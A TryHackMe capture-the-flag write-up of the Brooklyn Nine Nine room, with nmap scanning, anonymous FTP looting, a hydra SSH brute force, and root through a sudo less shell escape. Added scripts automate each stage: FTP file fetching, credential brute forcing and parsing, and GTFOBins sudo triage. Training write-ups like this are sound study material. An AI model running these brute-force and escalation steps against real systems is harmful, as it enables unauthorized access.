TryHackMe: Brooklyn Nine Nine Room Write-up
To access the box, click on the following link and join the room.
Check connection
Ping the machine IP to check that the connection is established. In my case the ping is successful, so the VPN connection to the room is working.
Scanning
Let’s start with an nmap scan. Use the following command to scan the target IP address.
sudo nmap -sV -Pn 10.10.111.89
The above command performs a service version detection scan with Nmap against the target IP address 10.10.111.89. The options we used are:
-sV
Enables version detection, so Nmap reports the service and its version running on each open port. Note that without -p- (or -p with a port list) Nmap only scans the 1000 most common TCP ports, so a service on an unusual port would be missed.
-Pn
Treats all hosts as online and skips host discovery. This is useful when we already know the target is up and don’t want Nmap to spend time on host discovery; it is also what you need when the target blocks ICMP, since the default ping probe would otherwise mark the host as down.
The Nmap scan results show that ports 21, 22 and 80 are open. Port 21 is normally FTP. Let’s find out whether anonymous login is allowed. We can do that by scanning port 21 on the target with the ftp-anon script.
nmap -p 21 --script ftp-anon.nse 10.10.111.89
The above command uses Nmap to scan port 21 on the target IP address 10.10.111.89 and runs the NSE script ftp-anon.nse. Here’s what each part of the command does:
-p 21
Specifies that we only want to scan port 21, which is commonly associated with FTP (File Transfer Protocol).
--script ftp-anon.nse
Executes the Nmap script ftp-anon.nse (the .nse suffix is optional). This script checks whether the FTP server allows anonymous (unauthenticated) logins and, if so, lists the files it can see.
10.10.111.89
is the IP address of the target host we want to scan.
The scan result shows that anonymous FTP login is allowed.
Anonymous FTP login
Let’s connect to the FTP service and see what we’ve got.
ftp 10.10.111.89
We used “anonymous” as both the username and the password to connect to the FTP service, and boom!!! we are in.
Let’s find out what we’ve got with the “ls” command. We find a file named “note_to_jake.txt”. Sounds interesting!!!
Let’s download the file to our machine with the “get” command.
get note_to_jake.txt
Let’s check what the note has in store for Jake. We can do that with the cat command.
cat note_to_jake.txt
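The scanning and anonymous-FTP steps above are easy to chain into one script when you run the same room again or hit a similar box. The following is an added example, not code from the original write-up: it parses Nmap’s grepable output (-oG) for open ports, and only when port 21 is open runs the ftp-anon script and pulls every file the anonymous listing exposes with curl (a non-interactive stand-in for the ftp client used above). The target IP is the one from the write-up; the SAMPLE variable is a constructed grepable line used only to exercise the parser, and the loot/ directory name is my own choice.

```shell
#!/bin/sh
# Added example (not from the original write-up): automate the enumeration
# chain: service scan -> is 21 open? -> ftp-anon -> fetch anonymous files.
set -u

# Parse nmap grepable output (nmap -oG -) and print open TCP ports, one per
# line. Each "Ports:" entry looks like "21/open/tcp//ftp///"; closed or
# filtered entries do not match "/open/tcp" and are skipped.
open_ports() {
    # $1: grepable nmap output as a string
    printf '%s\n' "$1" \
        | grep -o '[0-9]*/open/tcp' \
        | cut -d/ -f1
}

# Return 0 if the given port number is in the open-port list.
port_is_open() {
    # $1: newline-separated port list, $2: port number
    printf '%s\n' "$1" | grep -qx "$2"
}

# Run the real scan against the target and, if 21 is open, check for
# anonymous login and mirror whatever the anonymous user can list.
enumerate() {
    target="$1"
    scan="$(sudo nmap -sV -Pn -oG - "$target")"
    ports="$(open_ports "$scan")"
    echo "open ports: $(printf '%s' "$ports" | tr '\n' ' ')"

    if port_is_open "$ports" 21; then
        nmap -p 21 --script ftp-anon "$target"
        # curl speaks FTP; anonymous:anonymous is what we typed into ftp.
        # -l (--list-only) returns bare file names, one per line.
        mkdir -p loot
        for f in $(curl -s -l --user anonymous:anonymous "ftp://$target/"); do
            curl -s --user anonymous:anonymous "ftp://$target/$f" -o "loot/$f" \
                && echo "fetched $f"
        done
    fi
}

# Constructed sample of grepable output (no real service versions), used only
# to show what open_ports extracts. Port 25 is filtered and must be ignored.
SAMPLE='Host: 10.10.111.89 ()  Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 25/filtered/tcp//smtp///, 80/open/tcp//http///  Ignored State: closed (996)'

# Usage: sh enum.sh 10.10.111.89
if [ -n "${1:-}" ]; then
    enumerate "$1"
fi
```

The parser is deliberately the only part that does not touch the network, so it can be checked on saved output before pointing the script at a live target; the file loop assumes file names without spaces, which is what the anonymous share on this room contains.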
Let’s all bow down to Amy, the password detective, for enlightening us about Jake’s password being as strong as wet tissue paper! Bravo, Amy, for your remarkable discovery! Let’s check whether we can SSH into jake’s account with a simple password.
Jake’s account is password protected and a quick guess doesn’t get us in. Let’s brute force it.
Brute-Force Attack
As we know jake’s account has a weak password, let’s launch a dictionary attack with hydra, an online login brute-forcer (it tries passwords against the live SSH service rather than cracking hashes).
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.111.89
hydra
is the command to run the Hydra tool.
-l jake
specifies a single username to be used during the attack. In this case, it’s the username “jake” (a capital -L would take a file of usernames instead).
-P /usr/share/wordlists/rockyou.txt
specifies the path to a password list (in this case, rockyou.txt) to use for the dictionary attack.
ssh://10.10.111.89
specifies the protocol and the target SSH server’s IP address or hostname that we want to attack.
Hydra prints a warning for SSH that many servers limit parallel connections and recommends -t 4; with the default 16 tasks some attempts fail with connection errors and the correct password can be missed, so on a slower or stricter target lower the task count.
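Running hydra by hand and reading the password off the screen works for one box, but for the next step (ssh) it helps to capture the result in a form you can reuse. The following is an added example, not from the original write-up: a wrapper that runs hydra with the SSH-friendly options mentioned above (-t 4, -f to stop at the first hit, -o to keep a log) and a parser that pulls user:password out of hydra’s success line. The result-line format is hydra’s real one; the sample output, including the password placeholder-pass, is constructed and is not the room’s password.

```shell
#!/bin/sh
# Added example (not from the original write-up): brute-force SSH with hydra
# and extract the credential pair from its output for the next step.
set -u

# Extract "user:password" from a hydra success line such as
#   [22][ssh] host: 10.10.111.89   login: jake   password: s3cret
# Prints nothing and returns 1 when no such line is present.
parse_hydra() {
    # $1: hydra output (string)
    printf '%s\n' "$1" \
        | sed -n 's/^\[[0-9]*\]\[ssh\] host: [^ ]*  *login: \([^ ]*\)  *password: \(.*\)$/\1:\2/p' \
        | grep .
}

# Run hydra against one user and print "user:password" on success.
brute_force_ssh() {
    target="$1"
    user="$2"
    wordlist="${3:-/usr/share/wordlists/rockyou.txt}"
    # -t 4 : hydra itself warns that sshd limits parallel sessions and
    #        recommends 4 tasks; the default 16 causes dropped attempts.
    # -f   : exit as soon as one valid pair is found.
    # -o   : also write the result to a file so it survives the terminal.
    out="$(hydra -l "$user" -P "$wordlist" -t 4 -f -o hydra-ssh.log "ssh://$target")" || return 1
    parse_hydra "$out"
}

# Constructed sample of hydra output; the password is a placeholder.
SAMPLE_HYDRA='[DATA] attacking ssh://10.10.111.89:22/
[22][ssh] host: 10.10.111.89   login: jake   password: placeholder-pass
1 of 1 target successfully completed, 1 valid password found'

# Usage on your attack box (sshpass is a separate package):
#   creds=$(brute_force_ssh 10.10.111.89 jake) \
#     && sshpass -p "${creds#*:}" ssh "${creds%%:*}@10.10.111.89"
```

The sed pattern anchors on the literal "[22][ssh] host:" prefix so that hydra’s banner and status lines never produce a false credential; a password containing spaces is still captured because the final group runs to the end of the line.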
We got a valid username and password for jake. Now let’s SSH in using that information.
Boom!! We are in. Let’s verify which user we are with the command “whoami”.
We have successfully logged in as jake.
Get user flag
Let’s search for the user flag using the find command.
find / -type f -name "user.txt" 2>/dev/null
/
is the starting directory for the search. In this case, it starts from the root directory, so it will search the entire file system.
-type f
specifies that we are looking for regular files (not directories).
-name "user.txt"
is the name of the file we’re searching for.
2>/dev/null
redirects error messages to /dev/null, so we won’t see the “Permission denied” messages for directories jake cannot read.
We found the flag. Let’s navigate to the respective directory and capture the flag with the cat command.
We can see the user flag by viewing user.txt in the terminal. Congratulations!! Let’s move on to mission possible 2 and capture the root flag.
Get root flag
Now that we are logged in as the user jake, we will check our sudo privileges by running the following command:
sudo -l
It lists which commands or scripts the current user is allowed to execute with superuser (root) privileges or as another specified user, and whether a password is required for each.
The result shows we are allowed to run less with sudo privileges. Let’s go to https://gtfobins.github.io/ and search for less. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions on misconfigured systems; each entry is grouped by the context it abuses (sudo, SUID, capabilities and so on). Click on “Sudo” to get the relevant entry.
We got a command; let’s try it out.
That actually worked and we are the root user now. The underlying problem is that less is a pager with a shell-escape feature, so letting a user run it as root is equivalent to giving that user a root shell.
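Looking each binary up on GTFOBins by hand is fine for one entry, but sudo -l often lists several, so it helps to triage them automatically. The following is an added example, not from the original write-up: it parses the allowed-commands part of sudo -l output and flags any binary that has a GTFOBins sudo entry giving a shell. The short binary list is my own and incomplete; the sample sudo -l output has the shape sudo prints, but the hostname “target” and the NOPASSWD tag are assumptions, not details from the room. For less, the GTFOBins technique is sudo less /etc/profile and then !/bin/sh at the less prompt.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag sudo -l entries that
# correspond to well-known GTFOBins shell escapes.
set -u

# Partial list of binaries with a GTFOBins "sudo" entry that yields a shell.
# less is the one this room hands out. GTFOBins' entry for it is:
#   sudo less /etc/profile      then, at the less prompt:   !/bin/sh
GTFO_SHELL_BINS="less more vim vi nano find awk python python3 perl env bash sh man ftp"

# Print the absolute paths the user may run via sudo, one per line. Only the
# section after "may run the following commands" is considered, so paths in
# the Defaults block (e.g. secure_path) are not reported.
sudo_allowed_paths() {
    # $1: output of `sudo -l` as a string
    printf '%s\n' "$1" \
        | sed -n '/may run the following commands/,$p' \
        | grep -o '/[^ ,]*'
}

# Print every allowed path whose basename is in GTFO_SHELL_BINS.
gtfobins_candidates() {
    for p in $(sudo_allowed_paths "$1"); do
        b="${p##*/}"
        case " $GTFO_SHELL_BINS " in
            *" $b "*) printf '%s\n' "$p" ;;
        esac
    done
}

# Constructed sample in the shape of `sudo -l` output; hostname and the
# NOPASSWD tag are assumptions. /usr/bin/id is included as a harmless entry
# that must not be flagged.
SAMPLE_SUDO='Matching Defaults entries for jake on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jake may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) /usr/bin/id'

# Usage on the box: gtfobins_candidates "$(sudo -l)"
```

Anything the script prints is worth a manual check against the matching GTFOBins page, since the exact escape differs per binary; anything it does not print still deserves a look, because the list above is far from the full set of GTFOBins entries.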
I just assume that if the user flag was in user.txt, the root flag might be in root.txt. Let’s use the find command again to locate root.txt.
find / -type f -name "root.txt" 2>/dev/null
/
is the starting directory for the search. In this case, it starts from the root directory, so it will search the entire file system.
-type f
specifies that we are looking for regular files (not directories).
-name "root.txt"
is the name of the file we’re searching for.
2>/dev/null
redirects error messages to /dev/null, so we won’t see “Permission denied” messages (now that we are root there should be none, but it keeps the output clean).
We found the path of the root.txt file. Let’s use the cat command to capture the flag. This time we will just pass the absolute path of the file to cat.
There we go, we got our root flag! Paste both flags (user and root) into TryHackMe and enjoy the success.
CONGRATULATIONS!!! The room is completed!
“This was the first approach we used to conquer the Brooklyn Nine-Nine room challenge. If you’re curious about the second method, you can dive into that write-up by clicking the link below.”
This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊